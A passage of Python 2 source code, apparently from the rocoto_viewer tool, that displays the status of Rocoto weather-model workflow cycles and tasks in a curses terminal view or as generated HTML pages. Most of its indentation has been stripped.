workflow_name = 'gfs_workflow'
if 'ROTDIR' in entity_values:
ROTDIR = entity_values['ROTDIR']
else:
ROTDIR = 'no_rotdir'
if 'PSLOT' in entity_values:
PSLOT = entity_values['PSLOT']
else:
PSLOT = 'no_name'
if 'PACKAGE' in entity_values:
PACKAGE = entity_values['PACKAGE']
if PACKAGE == 'ugcs':
workflow_name = 'ugcs_workflow'
if PACKAGE == 'gfs':
workflow_name = 'gfs_workflow'
else:
PACKAGE = 'none'
if 'EXPDIR' in entity_values:
EXPDIR = entity_values['EXPDIR']
else:
EXPDIR = '.'
if html_output:
html_ptr = None
if not send_html_to_rzdm and len(rzdm_path) != 0:
html_output_dir = shbackslash(rzdm_path)
else:
html_output_dir = shbackslash('%s/pr%s'%(workflow_name,PSLOT))
print 'writing html to directory:',html_output_dir
html_output_file = shbackslash( html_output_dir+'/index.html' )
html_header_line = '<table>\n<thead><tr><td>CYCLE</td><td>TASK</td><td>JOBID</td><td>STATE</td><td>EXIT</td><td>TRIES</td><td>DURATION</td>'
if use_performance_metrics:
html_header_line = html_header_line+'<td>SLOTS</td><td>QTIME</td><td>CPU</td><td>RUN</td>'+'</tr></thead>\n<tbody>'
else:
html_header_line = html_header_line+'</tr></thead>\n<tbody>'
print 'Generating html folder html: %s ...'%html_output_file
cmd = batchexe('rm') ['-Rf', html_output_dir ]
stat=runstr(cmd)
makedirs( html_output_dir )
html_ptr = open(html_output_file,'w')
html_ptr.write(ccs_html)
break_file = False
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
html_discribe_line = '\n<table>\n<thead>\n<tr><td><a href="index_exp.html">Expand</a></td><td>Refreshed: %s</td><td>PSLOT: %s</td></tr>\n'%(stat_update_time,PSLOT)
html_discribe_line += '<tr><td colspan="2">ROTDIR: %s</td><td><a href="../%s_perf_%s.pdf">Turn Around Times</a></td></tr>\n</thead>\n</table>\n<br>\n'%(workflow_name,ROTDIR,PSLOT)
html_discribe_line += html_header_line
html_ptr.write( html_discribe_line )
else:
curses.start_color()
curses.use_default_colors()
screen.refresh()
curses.mousemask(1)
curses.noecho()
for i in range(0, curses.COLORS):
curses.init_pair(i + 1, i,curses.COLOR_BLACK)
if i == 4:
curses.init_pair(i + 1, i,curses.COLOR_WHITE)
curses.init_pair(8, 0, -1)
curses.mousemask(curses.ALL_MOUSE_EVENTS)
#curses.init_pair(6,curses.COLOR_BLACK, curses.COLOR_CYAN)
highlightText = curses.A_STANDOUT
highlightSelectedText = curses.color_pair(5)
normalText = curses.A_NORMAL
cmd = batchexe('which') ['rocotorun']
try:
which_rocoto = runstr(cmd).strip()
except Exception,e:
curses.endwin()
        print '\n\nCRITICAL ERROR: rocotorun is not in your path, use "module load rocoto"'
sys.exit(0)
os.environ['TZ']='UTC'
std_time.tzset()
#stdout_buff = StringIO()
#stderr_buff = StringIO()
#sys.stdout = stdout_buff
#sys.stderr = stderr_buff
HOME = os.environ['HOME']
rocoto_temp = HOME+'/.rocoto/tmp'
makedirs( rocoto_temp )
global temp_workflow_file
workflow_basename = basename(workflow_file)+'.'
temp_file= tempfile.NamedTemporaryFile(prefix=workflow_basename, dir=rocoto_temp, delete=False)
temp_workflow_file = temp_file.name
old = open(workflow_file)
temp = []
for line in old:
if '&ENV_VARS;' not in line:
temp.append(line)
for line in temp:
temp_file.write(line)
temp_file.close()
old.close()
tasks_ordered = []
metatask_list = collections.defaultdict(list)
cycledef_group_cycles = collections.defaultdict(list)
queue_stat = Queue()
queue_check = Queue()
if only_check_point:
curses.endwin()
sys.stdout = os.fdopen(0,'w',0)
print 'Creating check point file ...'
params = (workflow_file, database_file, tasks_ordered, metatask_list, cycledef_group_cycles )
get_rocoto_stat( params, queue_stat )
stat_update_time = ''
params_check = ''
header = None
process_get_rocoto_stat = None
process_get_rocoto_check = None
cycle = 0
if html_output:
mlines = 100
mcols = 125
if not html_output and mcols < default_column_length:
curses.endwin()
print
        print 'Your terminal is only %d characters wide; it must be at least %d to display the workflow status'%(mcols,default_column_length)
sys.exit(-1)
if not html_output:
screen.refresh()
rocoto_stat_params = ''
rocoto_stat_params_tmp = ''
step = 0.0 ; i = 0
dots = ('. ','.. ','... ','.... ','.....',' ....',' ...',' .')
dot_stat = 0 ; dot_check = 0
current_time = time()
meta_tasklist = collections.defaultdict(list)
if save_checkfile_path is not None and check_file(save_checkfile_path):
with open(save_checkfile_path) as savefile:
rocoto_data_and_time = cPickle.load(savefile)
rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles, stat_update_time = rocoto_data_and_time
start_time = time() - stat_read_time_delay - 10
header = header_string
header = header.replace('t'*16,stat_update_time)
if PACKAGE.lower() == 'ugcs':
header = header.replace(' PSLOT: pslot ','==== UGCS ====')
elif PSLOT.lower() == 'no_name':
header = header.replace(' PSLOT: pslot ','==============')
reduce_header_size = 0
else:
header = header.replace(' PSLOT: pslot ','==== UGCS ====')
reduce_header_size = 0
if reduce_header_size > 0:
header = header[:-reduce_header_size]
header = header[reduce_header_size:]
if list_tasks:
params = (workflow_file, database_file, tasks_ordered, metatask_list, cycledef_group_cycles )
get_rocoto_stat( params, Queue() )
curses.endwin()
sys.stdout = os.fdopen(0,'w',0)
sys.exit(0)
if save_checkfile_path is None or (save_checkfile_path is not None and not check_file(save_checkfile_path)):
params = (workflow_file, database_file, tasks_ordered, metatask_list,cycledef_group_cycles)
if use_multiprocessing:
process_get_rocoto_stat = Process( target=get_rocoto_stat, args=[params, queue_stat] )
process_get_rocoto_stat.start()
screen.addstr(mlines-2,0,'No checkpoint file, must get rocoto stats please wait',curses.A_BOLD)
screen.addstr(mlines-1,0,'Running rocotostat ',curses.A_BOLD)
else:
(rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles) = get_rocoto_stat( params, Queue() )
header = header_string
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
header = header.replace('t'*16,stat_update_time)
if PSLOT.lower() == 'no_name':
header = header.replace(' PSLOT: pslot ','==============')
reduce_header_size = 0
elif PACKAGE.lower() == 'ugcs':
header = header.replace(' PSLOT: pslot ','==== UGCS ====')
reduce_header_size = 0
else:
header = header.replace('pslot',PSLOT)
reduce_header_size = int((len(PSLOT)-len('PSLOT'))/2)
if reduce_header_size > 0:
header = header[:-reduce_header_size]
header = header[reduce_header_size:]
while use_multiprocessing:
if mcols < default_column_length:
curses.endwin()
print
            print 'Your terminal is only %d characters wide; it must be at least %d to display the workflow status'%(mcols,default_column_length)
sys.exit(-1)
step += 0.001
if step > 100:
step = 0.0
i = (0 if i == len(dots)-1 else i+1 )
curses.curs_set(0)
screen.addstr(mlines-1,19,dots[i],curses.A_BOLD)
screen.refresh()
try:
rocoto_stat_params = queue_stat.get_nowait()
except:
pass
if len(rocoto_stat_params) != 0:
(rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles) = rocoto_stat_params
if use_multiprocessing:
process_get_rocoto_stat.join()
process_get_rocoto_stat.terminate()
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
header = header_string
header = header.replace('t'*16,stat_update_time)
if PSLOT.lower() == 'no_name':
header = header.replace(' PSLOT: pslot ','==============')
reduce_header_size = 0
elif PACKAGE.lower() == 'ugcs':
header = header.replace(' PSLOT: pslot ','==== UGCS ====')
reduce_header_size = 0
else:
header = header.replace('pslot',PSLOT)
reduce_header_size = int((len(PSLOT)-len('PSLOT'))/2)
if reduce_header_size > 0:
header = header[:-reduce_header_size]
header = header[reduce_header_size:]
break
start_time = time()
num_cycle = len(rocoto_stat)
time_to_load = (time()- current_time)/60.0
pad_pos = 0
update_pad = True
task = 0 ; execute_task = '' ; execute_cycle = ''
loading_stat = False
loading_check = False
find_next = 0
check_task = '' ; check_cycle = ''
rocoto_check = ''
break_twice = False
search_string = ''
meta_tasks = []
metatasks_state_cycle = []
metatasks_state_string_cycle = []
metatask_list_copy = collections.defaultdict(list)
metatask_name = collections.defaultdict(list)
for each_metatask in metatask_list:
metatask_name[each_metatask] = metatask_list[each_metatask][0]
del metatask_list[each_metatask][0]
tasks_in_cycle = []
for each_cycle in rocoto_stat:
list_of_tasks_per_cycle = []
meta_tasks_in_cycle = []
for each_line in each_cycle:
line_has_metatask = False
for check_metatask, check_metatask_list in metatask_list.iteritems():
if check_metatask in each_line:
meta_tasks_in_cycle.append( (check_metatask, True, check_metatask_list ) )
line_has_metatask = True
continue
else:
for every_meta_task in check_metatask_list:
each_element_in_line = each_line.split()
if every_meta_task != check_metatask:
for item in each_element_in_line:
if every_meta_task == item:
meta_tasks_in_cycle.append((every_meta_task, False, check_metatask) )
line_has_metatask = True
if not line_has_metatask:
if '---' not in each_line.split()[1]:
list_of_tasks_per_cycle.append(each_line.split()[1])
meta_tasks_in_cycle.append(('False',False,'False'))
tasks_in_cycle.append(list_of_tasks_per_cycle)
meta_tasks_state = dict()
meta_tasks_state_string = dict()
for check_metatask, check_metatask_list in metatask_list.iteritems():
meta_tasks_state[check_metatask] = True
meta_tasks_state_string[check_metatask] = ''
meta_tasks_state['False'] = False
meta_tasks.append(meta_tasks_in_cycle)
metatasks_state_cycle.append(meta_tasks_state)
metatasks_state_string_cycle.append(meta_tasks_state_string)
update_metatask_state_status_message = True
'''
# This lists each metatask and its elements
# for the first cycle for code edification
curses.endwin()
print
for each_metatask in meta_tasks[0]:
if each_metatask[1]:
print metatask_name[each_metatask[2][0]]
for task in each_metatask[2]:
print '',task
sys.exit(0)
'''
metatask_list_per_cycle = []
metatask_list_by_name = collections.defaultdict(dict)
for each_cycle in meta_tasks:
list_of_metatasks_in_cycle = []
for each_metatask in each_cycle:
if each_metatask[1]:
tasks_in_metatask_list = []
for task in each_metatask[2]:
tasks_in_metatask_list.append( task )
metatask_list_by_name[ metatask_name[each_metatask[2][0]] ] = tasks_in_metatask_list
list_of_metatasks_in_cycle.append( metatask_name[each_metatask[2][0]] )
metatask_list_per_cycle.append(list_of_metatasks_in_cycle)
found = False
end_found = False
found_cycle = 0
found_end_cycle = 0
for find_cycle in range(0,len(rocoto_stat)):
for lines in rocoto_stat[find_cycle]:
if not found and any(x in lines for x in ['RUNNING', 'QUEUED']):
found = True
found_cycle = find_cycle
if found and not any(x in lines for x in ['RUNNING', 'QUEUED']):
end_found = True
found_end_cycle = find_cycle
break
get_number_of_stats = 0
if found:
cycle = found_cycle
else:
get_number_of_stats = 2
if len(rocoto_stat) > 2:
cycle = len(rocoto_stat) - 2
else: cycle = 0
if html_output:
if cycle > 2:
cycle -= 2
html_start_cycle = cycle
html_output_firstpass = True
#debug.write('num cycles: %s\n'%str(len(rocoto_stat)))
while True:
num_columns = default_column_length
mlines = 90; mcols = 125
if header is None:
header = ' '
if update_pad is True:
#debug.write('cycle: %s\n'%str(cycle))
num_lines = len(rocoto_stat[cycle])
#debug.write('len rocoto_stat[cycle]: %s\n'%str(num_lines))
line_correction = 0
for count_meta_tasks in meta_tasks[cycle]:
if count_meta_tasks[1] and metatasks_state_cycle[cycle][ count_meta_tasks[0] ]:
line_correction += len(count_meta_tasks[2]) - 1
num_lines -= line_correction
update_pad = False
line_number = -1
colapsed_metatask = False
for line_num,line in enumerate(rocoto_stat[cycle]):
columns = line.split()
count_columns = line.split(' ')
spaces = []
for c,sub_group in groupby(count_columns):
if c != '': continue
spaces.append(' '*len(list(sub_group)))
spaces.append('')
text_color = {'SUCCEEDED':3,'QUEUED':4,'DEAD':2,'FAILED':2,'RUNNING':6}
skip_task = False
if not meta_tasks[cycle][line_num][1] and metatasks_state_cycle[cycle][ meta_tasks[cycle][line_num][2] ] :
skip_task = True
else:
line_number +=1
html_line = '<tr>'
if use_performance_metrics and len(columns) == 7:
for i in range(0,4):
columns.append('-')
for i,column in enumerate(columns):
if skip_task: continue
if not use_performance_metrics and i > 7: continue
execute_cycle = columns[0]
if i == 0:
if meta_tasks[cycle][line_num][1]:
if metatasks_state_cycle[cycle][columns[1]]:
colapsed_metatask = True
if update_metatask_state_status_message or len(metatasks_state_string_cycle[cycle][ columns[1] ])==0:
get_state_list = []
total_numer_of_tasks = len(meta_tasks[cycle][line_num][2])
for check_metatask_line in rocoto_stat[cycle]:
split_check_metatask_line = check_metatask_line.split()
for each_metatask in meta_tasks[cycle][line_num][2]:
if each_metatask == split_check_metatask_line[1]:
get_state_list.append(split_check_metatask_line[3])
metatask_state = columns[3]
if 'SUCCEEDED' in get_state_list:
metatask_state = '(%d/%d) SUCCEEDED'%(get_state_list.count('SUCCEEDED'),total_numer_of_tasks)
if 'QUEUED' in get_state_list:
metatask_state = '(%d/%d) QUEUED'%(get_state_list.count('QUEUED'),total_numer_of_tasks)
if 'RUNNING' in get_state_list:
metatask_state = '(%d/%d) RUNNING'%(get_state_list.count('RUNNING'),total_numer_of_tasks)
if 'DEAD' in get_state_list:
metatask_state = '(%d/%d) DEAD'%(get_state_list.count('DEAD'),total_numer_of_tasks)
metatasks_state_string_cycle[cycle][ columns[1] ] = metatask_state
html_line += '<td>'+column+'</td>'
elif i == 1:
save_column = column
if colapsed_metatask:
colapsed_metatask = False
column = metatask_name[column]
display_column = (column if len(column) < 40 else column[:40])
if line_number == task:
execute_task = save_column
if html_output:
log_file = ''
for find_task in tasks_ordered:
if find_task[0] == column:
log_file = find_task[2].replace('CYCLE', execute_cycle[:-2] )
if check_file(shbackslash( log_file )):
deliver_file( log_file, html_output_dir )
log_file_base = os.path.basename(log_file)
html_line += '<td><a href="%s">'%log_file_base+display_column+'</a></td>'
else:
html_line += '<td>'+display_column+'</td>'
elif i == 2:
if len(column) > 7:
column = column[:7]
html_line += '<td>'+column+'</td>'
elif i == 3:
if meta_tasks[cycle][line_num][1] and len(metatasks_state_string_cycle[cycle][ columns[1] ].split())!=1 and metatasks_state_cycle[cycle][columns[1]]:
column = metatasks_state_string_cycle[cycle][ columns[1] ]
if len(column)>15:
if column.split()[1] == 'SUCCEEDED':
html_line += '<td><green>'+column[:15]+'</green></td>'
elif column.split()[1] == 'QUEUED':
html_line += '<td><yellow>'+column[:15]+'</yellow></td>'
elif column.split()[1] in('DEAD','FAILED'):
html_line += '<td><red>'+column[:15]+'</red></td>'
elif column.split()[1] == 'RUNNING':
html_line += '<td><blue>'+column[:15]+'</blue></td>'
else:
html_line += '<td>'+column[:15]+'</td>'
else:
if column.split()[1] == 'SUCCEEDED':
html_line += '<td><green>'+column+'</green></td>'
elif column.split()[1] == 'QUEUED':
html_line += '<td><yellow>'+column+'</yellow></td>'
elif column.split()[1] in('DEAD','FAILED'):
html_line += '<td><red>'+column+'</red></td>'
elif column.split()[1] == 'RUNNING':
html_line += '<td><blue>'+column+'</blue></td>'
else:
html_line += '<td>'+column+'</td>'
elif column in text_color:
if column == 'SUCCEEDED':
html_line += '<td><green>'+column+'</green></td>'
elif column == 'QUEUED':
html_line += '<td><yellow>'+column+'</yellow></td>'
elif column in('DEAD','FAILED'):
html_line += '<td><red>'+column+'</red></td>'
elif column == 'RUNNING':
html_line += '<td><blue>'+column+'</blue></td>'
else:
html_line += '<td>'+column+'</td>'
else:
html_line += '<td>'+column+'</td>'
else:
if len(column)<6:
html_line += '<td>'+column+'</td>'
else:
html_line += '<td>'+column+'</td>'
if not skip_task:
html_line += '</tr>\n'
html_ptr.write(html_line)
update_metatask_state_status_message = False
found_still_running = False
cycle += 1
update_pad = True
for find_cycle in range(cycle,len(rocoto_stat)):
for lines in rocoto_stat[find_cycle]:
if 'RUNNING' in lines:
found_still_running = True
break
break
if get_number_of_stats >= 0:
found_still_running = True
if cycle < len(rocoto_stat) or found_still_running:
html_line = '</table>\n'
html_line += '\n<br>\n\n'
html_line += html_header_line
html_ptr.write(html_line)
get_number_of_stats -= 1
else:
html_line = '</tbody>\n'
html_line += '</table>\n'
html_line += '</html>\n'
html_ptr.write(html_line)
html_ptr.close()
if html_output_firstpass:
for meta_cycle in range(0,len(rocoto_stat)):
for execute_task in metatasks_state_cycle[meta_cycle]:
metatasks_state_cycle[meta_cycle][execute_task] = False
html_output_file = shbackslash( html_output_dir+'/index_exp.html' )
html_ptr = open(html_output_file,'w')
html_ptr.write(ccs_html)
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
html_discribe_line = '\n<table>\n<thead>\n<tr><td><a href="index.html">Collapse</a></td><td>Refreshed: %s</td><td>PSLOT: %s</td></tr>\n'%(stat_update_time,PSLOT)
html_discribe_line += '<tr><td colspan="2">ROTDIR: %s</td><td><a href="../%s_perf_%s.pdf">Turn Around Times</a></td></tr>\n</thead>\n</table>\n<br>\n'%(workflow_name,ROTDIR,PSLOT)
html_discribe_line += html_header_line
html_ptr.write( html_discribe_line )
html_output_firstpass = False
#cycle = html_start_cycle
if not html_output_firstpass:
if send_html_to_rzdm:
print 'sending html files to rzdm using rsync ...'
cmd=batchexe('rsync')['-avzr','--delete', html_output_dir, rzdm_path]
stat=runstr(cmd)
if stat is None:
print 'warning: rsync of %s to %s failed'%(html_output_dir,rzdm_path)
sys.exit(-1)
else:
print 'done'
sys.exit(0)
else:
# Main Curses Screen Loop
# Write to curses screen when HTML is not outputted
highlight_CYCLE = False
highlight_WORKFLOW = False
get_execute_task_track = False
screen.clear()
global screen_resized
selected_tasks = collections.defaultdict(list)
selected_meta_tasks = collections.defaultdict(list)
execute_metatask = None
colapsed_metatask = None
task = 0
while True:
if not check_file(workflow_file) or not check_file(database_file):
curses.endwin()
print;print
print 'rocoto_viewer quit because the Rocoto database or XML file used by this session went missing'
sys.exit(-1)
job_id = None
curses.noecho()
num_columns = default_column_length
if header is None:
header = ' '
if highlight_WORKFLOW:
header_split = header.split('\n')
screen.addstr(0,0,header_split[0]+'\n')
screen.addstr(header_split[1],curses.A_STANDOUT)
else:
screen.addstr(0,0,header)
if update_pad is True:
num_lines = len(rocoto_stat[cycle])
line_correction = 0
for count_meta_tasks in meta_tasks[cycle]:
if count_meta_tasks[1] and metatasks_state_cycle[cycle][ count_meta_tasks[0] ]:
line_correction += len(count_meta_tasks[2]) - 1
num_lines -= line_correction
update_pad = False
if mlines > num_lines:
pad = curses.newpad(mlines ,num_columns)
else:
pad = curses.newpad(num_lines+1 ,num_columns)
line_number = -1
for line_num,line in enumerate(rocoto_stat[cycle]):
#debug.write('DISPLAY LINE: '+line+'\n')
colapsed_metatask = False
columns = line.split()
count_columns = line.split(' ')
spaces = []
for c,sub_group in groupby(count_columns):
if c != '': continue
spaces.append(' '*len(list(sub_group)))
spaces.append('')
text_color = {'SUCCEEDED':3,'QUEUED':4,'DEAD':2,'FAILED':2,'RUNNING':6}
skip_task = False
if not meta_tasks[cycle][line_num][1] and metatasks_state_cycle[cycle][ meta_tasks[cycle][line_num][2] ] :
skip_task = True
else:
line_number +=1
if use_performance_metrics and len(columns) == 7:
for i in range(0,4):
columns.append('-')
for i,column in enumerate(columns):
if skip_task: continue
if not use_performance_metrics and i > 7: continue
execute_cycle = columns[0]
if i == 0:
if meta_tasks[cycle][line_num][1]:
if metatasks_state_cycle[cycle][columns[1]]:
if highlight_CYCLE:
pad.addstr(column, curses.A_STANDOUT)
else:
pad.addstr(column)
pad.addstr(' < ')
colapsed_metatask = True
if update_metatask_state_status_message or len(metatasks_state_string_cycle[cycle][ columns[1] ])==0:
get_state_list = []
total_numer_of_tasks = len(meta_tasks[cycle][line_num][2])
for check_metatask_line in rocoto_stat[cycle]:
split_check_metatask_line = check_metatask_line.split()
for each_metatask in meta_tasks[cycle][line_num][2]:
if each_metatask == split_check_metatask_line[1]:
get_state_list.append(split_check_metatask_line[3])
red_override = False
metatask_state = columns[3]
if 'SUCCEEDED' in get_state_list:
metatask_state = '(%d/%d) SUCCEEDED'%(get_state_list.count('SUCCEEDED'),total_numer_of_tasks)
if 'QUEUED' in get_state_list:
metatask_state = '(%d/%d) QUEUED'%(get_state_list.count('QUEUED'),total_numer_of_tasks)
if 'RUNNING' in get_state_list:
metatask_state = '(%d/%d) RUNNING'%(get_state_list.count('RUNNING'),total_numer_of_tasks)
if 'FAILED' in get_state_list:
metatask_state = '(%d/%d) FAILED'%(get_state_list.count('FAILED'),total_numer_of_tasks)
red_override = True
if 'DEAD' in get_state_list:
red_override = True
metatask_state = '(%d/%d) DEAD'%(get_state_list.count('DEAD'),total_numer_of_tasks)
metatasks_state_string_cycle[cycle][ columns[1] ] = metatask_state
else:
if highlight_CYCLE:
pad.addstr(column, curses.A_STANDOUT)
else:
pad.addstr(column)
pad.addstr(' > ')
else:
if highlight_CYCLE:
pad.addstr(column,curses.A_STANDOUT)
pad.addstr(' ')
else:
pad.addstr(column+' ')
elif i == 1:
save_column = column
if colapsed_metatask:
column = metatask_name[column]
display_column = (column if len(column) < 19 else column[:19])
if line_number == task and not highlight_CYCLE and not highlight_WORKFLOW :
pad.addstr(display_column,curses.A_STANDOUT)
execute_task_track = save_column
if colapsed_metatask:
execute_metatask_check = True
execute_metatask = column
metatask_list_of_selected_metatask = meta_tasks[cycle][line_num][2]
else:
execute_metatask_check = False
execute_metatask = None
metatask_list_of_selected_metatask = None
execute_task = column
else:
#if column in metatask_list_by_name[metatask_name[column]]:
# display_column = ' '+display_column
if column in selected_tasks[execute_cycle]:
pad.addstr(display_column, highlightSelectedText )
elif column in selected_meta_tasks[execute_cycle]:
pad.addstr(display_column, highlightSelectedText )
else:
pad.addstr(display_column)
pad.addstr(' '*(21-len(display_column)))
elif i == 2:
job_id = column.strip()
if len(job_id) > 9:
job_id = job_id[:9]
if job_id == '-':
pad.addstr(job_id+' '*9)
else:
pad.addstr(job_id+' '*(10-len(job_id)))
elif i == 3:
if meta_tasks[cycle][line_num][1] and len(metatasks_state_string_cycle[cycle][ columns[1] ].split())!=1 and metatasks_state_cycle[cycle][columns[1]]:
column = metatasks_state_string_cycle[cycle][ columns[1] ]
if red_override:
the_text_color = 2
else:
the_text_color = text_color[column.split()[1]]
if len(column) >= 15:
pad.addstr( column[:15],curses.color_pair(the_text_color)|curses.A_STANDOUT)
column = column[:15]
else:
pad.addstr( column,curses.color_pair(the_text_color)|curses.A_STANDOUT)
elif column in text_color:
pad.addstr(column, curses.color_pair(text_color[column])|curses.A_STANDOUT)
else:
pad.addstr(column)
pad.addstr(' '*(16-len(column)),curses.color_pair(8))
elif i in (4,5,6,7,8,9,10):
if len(column) < 8:
pad.addstr(column+' '*(8-len(column)))
else:
pad.addstr(column.strip()+' ')
if not skip_task:
pad.addstr('\n')
update_metatask_state_status_message = False
pad.refresh( pad_pos, 0, 2,0, mlines-4,mcols)
entire_workflow = 'Hit <ENTER> to open cycle based information page (implementation pending)'
entire_cycle = '********* The ENTIRE CYCLE has been selected for an action **********'
try:
if highlight_WORKFLOW:
screen.addstr(mlines-2,0,entire_workflow,curses.A_BOLD)
else:
screen.addstr(mlines-2,0,' '*len(entire_workflow))
if highlight_CYCLE:
screen.addstr(mlines-2,0,entire_cycle,curses.A_BOLD)
elif not highlight_WORKFLOW:
screen.addstr(mlines-2,0,' '*len(entire_cycle))
if pad_pos < num_lines-mlines+4 or pad_pos > 0:
screen.addstr(mlines-1,0,' '*len(bottom_message_scroll))
screen.addstr(mlines-1,0,bottom_message_scroll,curses.A_BOLD)
else:
screen.addstr(mlines-1,0,' '*len(bottom_message_scroll))
screen.addstr(mlines-1,0,bottom_message,curses.A_BOLD)
except:
std_time.sleep(1)
pass
if num_columns > mcols:
curses.endwin()
print
print 'Your terminal is only %s characters wide; it must be at least %s to display the workflow status'%(str(mcols),str(num_columns))
sys.exit(-1)
if loading_stat:
dot_stat = (0 if dot_stat == len(dots)-1 else dot_stat+1 )
screen.addstr(mlines-2,0,'Running rocotostat ')
screen.addstr(mlines-2,20,dots[dot_stat])
try:
rocoto_stat_tmp = queue_stat.get_nowait()
except:
rocoto_stat_tmp = ''
if len(rocoto_stat_tmp) != 0:
(rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles) = rocoto_stat_tmp
process_get_rocoto_stat.join()
process_get_rocoto_stat.terminate()
update_pad = True
loading_stat = False
rocoto_stat_tmp = ''
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
header = header_string
header = header.replace('t'*16,stat_update_time)
header = header.replace('pslot',PSLOT)
reduce_header_size = int((len(PSLOT)-len('PSLOT'))/2)
if reduce_header_size > 0:
header = header[:-reduce_header_size]
header = header[reduce_header_size:]
screen.addstr(mlines-2,0,'Updated new rocotostatus: %s'%stat_update_time+' '*48)
screen.refresh()
std_time.sleep(0.5)
screen.addstr(mlines-2,0,' '*100)
screen.refresh()
if loading_check:
if time() - current_check_time > 5:
dot_check = (0 if dot_check == len(dots)-1 else dot_check+1 )
loc = (0 if not loading_stat else 27)
screen.addstr(mlines-2,loc,'Running rocotocheck ')
screen.addstr(mlines-2,loc+20,dots[dot_check])
try:
rocoto_check = queue_check.get_nowait()
except:
pass
if len(rocoto_check) != 0:
process_get_rocoto_check.join()
process_get_rocoto_check.terminate()
loading_check = False
if time() - current_check_time > 5:
event = screen.getch()
time_inc = 0.0
while event != curses.KEY_ENTER and event != 10:
message_string = 'rocotocheck for %s %s is ready for viewing'%(params_check[2],params_check[3])
message_string = (message_string if len(message_string) < mcols else message_string[:mcols-1])
time_inc += 1
if time_inc > 4:
screen.addstr(mlines-2,0, message_string)
screen.addstr(mlines-2,len(message_string),' ')
time_inc = 0.0
else:
screen.addstr(mlines-2,0,message_string)
screen.addstr(mlines-2,len(message_string),' <Hit Enter>',curses.A_BOLD)
event = screen.getch()
display_results(rocoto_check,screen,params_check)
rocoto_check = ''
curses.curs_set(0)
curses.halfdelay(2)
screen.keypad(1)
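# Keyboard/mouse dispatch for the interactive view (handled below): arrows, PgUp/PgDn
# ('u'/'d') and the mouse move the selection; 'x' or a double-click toggles a metatask;
# <ENTER> selects a task or opens the metatask selector; 'c' runs rocotocheck; 'f' links
# the task log into EXPDIR; 'r' rocotorewind; 'b' rocotoboot; 'R' rocotorun; 'U' clears
# the selection; '/' searches ('n'/'N' next/previous match); 'F' jumps near the first
# cycle with RUNNING tasks; 'l' forces a rocotostat refresh; 'h' shows help; 'Q' quits.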
event = screen.getch()
if event in (curses.KEY_LEFT, curses.KEY_RIGHT):
highlight_CYCLE = False
highlight_WORKFLOW = False
if event == curses.KEY_LEFT:
pad_pos = 0
#debug.write('KEY_LEFT %s\n'%pad_pos)
if cycle - 1 >= 0:
cycle -= 1
elif event == curses.KEY_RIGHT:
pad_pos = 0
#debug.write('KEY_RIGHT %s\n'%pad_pos)
if cycle + 1 < num_cycle:
cycle += 1
num_lines = len(rocoto_stat[cycle])
line_correction = 0
for count_meta_tasks in meta_tasks[cycle]:
if count_meta_tasks[1] and metatasks_state_cycle[cycle][ count_meta_tasks[0] ]:
line_correction += len(count_meta_tasks[2])-1
num_lines -= line_correction
if task > num_lines-1:
task = num_lines-1
update_pad = True
if event == ord('Q'):
break
if get_execute_task_track:
get_execute_task_track = False
if execute_task_track in metatasks_state_cycle[cycle]:
metatasks_state_cycle[cycle][execute_task_track] = not metatasks_state_cycle[cycle][execute_task_track]
update_metatask_state_status_message = True
update_pad = True
if event == curses.KEY_MOUSE:
mouse_id, mouse_x, mouse_y, mouse_z, button_state = curses.getmouse()
task_mouse_pos = pad_pos+mouse_y-2
if task_mouse_pos >= 0 and task_mouse_pos < num_lines:
task = task_mouse_pos
update_pad = True
if button_state & curses.BUTTON1_DOUBLE_CLICKED and mouse_x in range(12,15):
get_execute_task_track = True
if event == ord('x'):
if execute_task_track in metatasks_state_cycle[cycle]:
metatasks_state_cycle[cycle][execute_task_track] = not metatasks_state_cycle[cycle][execute_task_track]
update_metatask_state_status_message = True
update_pad = True
if screen_resized:
screen.erase()
screen.refresh()
update_pad = True
task = pad_pos
screen_resized = False
curses.resizeterm(mlines, mcols)
#debug.write('SCREEN RESIZED %s (%d,%d)\n'%(pad_pos,mlines,mcols))
if mcols < default_column_length:
curses.endwin()
print
print 'Your terminal is only %d characters wide; it must be at least %d to display the workflow status'%(mcols,default_column_length)
sys.exit(-1)
elif event in ( curses.KEY_NPAGE, ord('d') ):
highlight_CYCLE = False
highlight_WORKFLOW = False
if pad_pos + mlines < num_lines-mlines+5:
pad_pos += mlines - 5
task += mlines - 5
else:
pad_pos = num_lines-mlines+5
task = num_lines-1
update_pad = True
elif event in ( curses.KEY_PPAGE, ord('u') ):
highlight_CYCLE = False
highlight_WORKFLOW = False
if pad_pos != 0:
if pad_pos - mlines > 0:
pad_pos -= mlines - 5
if task > pad_pos+mlines-6:
task -= mlines - 5
else:
pad_pos = 0
task = 0
update_pad = True
elif event in (curses.KEY_UP, curses.KEY_SR):
if task == 0:
if highlight_CYCLE:
highlight_CYCLE = False
highlight_WORKFLOW = True
if not highlight_WORKFLOW:
highlight_CYCLE = True
if task != pad_pos:
update_pad = True
task -= 1
elif pad_pos != 0:
pad_pos -= 1
task -= 1
if event == curses.KEY_SR:
if execute_metatask_check:
if execute_metatask in selected_meta_tasks[execute_cycle]:
if len(selected_meta_tasks[execute_cycle]) > 0:
selected_meta_tasks[execute_cycle].remove(execute_metatask)
else:
selected_meta_tasks[execute_cycle].append(execute_metatask)
else:
if execute_task in selected_tasks[execute_cycle]:
if len(selected_tasks[execute_cycle]) > 0:
selected_tasks[execute_cycle].remove(execute_task)
else:
selected_tasks[execute_cycle].append(execute_task)
update_pad = True
elif event in ( curses.KEY_DOWN, curses.KEY_SF ):
if highlight_CYCLE or highlight_WORKFLOW:
task = -1
highlight_CYCLE = False
highlight_WORKFLOW = False
if task != num_lines-1 and task < pad_pos+mlines-6:
task += 1
elif pad_pos < num_lines-mlines+5:
pad_pos += 1
task += 1
if event == curses.KEY_SF:
if execute_metatask_check:
if execute_metatask in selected_meta_tasks[execute_cycle]:
if len(selected_meta_tasks[execute_cycle]):
selected_meta_tasks[execute_cycle].remove(execute_metatask)
else:
selected_meta_tasks[execute_cycle].append(execute_metatask)
